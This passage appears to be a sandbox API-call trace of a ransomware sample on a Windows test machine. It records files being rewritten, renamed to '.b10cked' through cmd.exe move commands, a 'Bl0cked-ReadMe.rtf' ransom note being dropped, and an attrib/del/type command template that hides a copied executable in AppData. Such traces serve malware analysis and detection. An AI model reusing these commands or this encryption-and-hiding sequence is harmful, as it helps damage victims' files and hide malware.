lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xfc9c [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.866] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7e4d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.866] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7e4d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-32333, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7e4f [0219.866] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7e4d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.867] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-32333, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7e4f [0219.867] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7e4d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DDlQzm1zrUmfqtdJ.png", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DDlQzm1zrUmfqtdJ.png", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DDlQzm1zrUmfqtdJ.png", lpUsedDefaultChar=0x0) returned 20 [0219.871] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xfc9c [0219.871] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.871] CloseHandle (hObject=0x1b4) returned 1 [0219.872] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG") returned 0x25 [0219.872] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.872] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" 
\"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xedc, dwThreadId=0xe4c)) returned 1 [0219.878] CloseHandle (hObject=0x120) returned 1 [0219.878] CloseHandle (hObject=0x1b4) returned 1 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.878] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27666759978) returned 1 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.880] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.880] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.880] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x139e [0219.880] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1886 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1886 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.881] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xc42, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.881] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xc42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3138, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc44 [0219.881] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xc42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3138, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc44 [0219.881] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xc42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xc42, lpOverlapped=0x0) returned 1 [0219.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bON4k7zjy0QFC_kDVvV.avi", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0219.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bON4k7zjy0QFC_kDVvV.avi", cchWideChar=23, lpMultiByteStr=0x1328744, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bON4k7zjy0QFC_kDVvV.avi", lpUsedDefaultChar=0x0) returned 23 [0219.885] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1886 [0219.885] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.885] CloseHandle (hObject=0x1b4) returned 1 [0219.886] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI") returned 0x2a [0219.887] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.887] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd54, dwThreadId=0xd28)) returned 1 [0219.917] CloseHandle (hObject=0x120) returned 1 [0219.917] CloseHandle (hObject=0x1b4) returned 1 [0219.917] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0219.917] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.917] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.918] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0219.918] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.918] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0219.918] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0219.918] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0219.918] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0219.918] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.918] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0219.918] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0219.918] 
CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xddc, dwThreadId=0xe1c)) returned 1 [0219.933] CloseHandle (hObject=0x120) returned 1 [0219.933] CloseHandle (hObject=0x1b4) returned 1 [0219.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0xffffffff [0219.934] GetLastError () returned 0x2 [0219.934] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0219.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0x20 [0219.938] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0219.938] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0219.938] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0219.938] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0219.938] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0219.939] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0219.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: 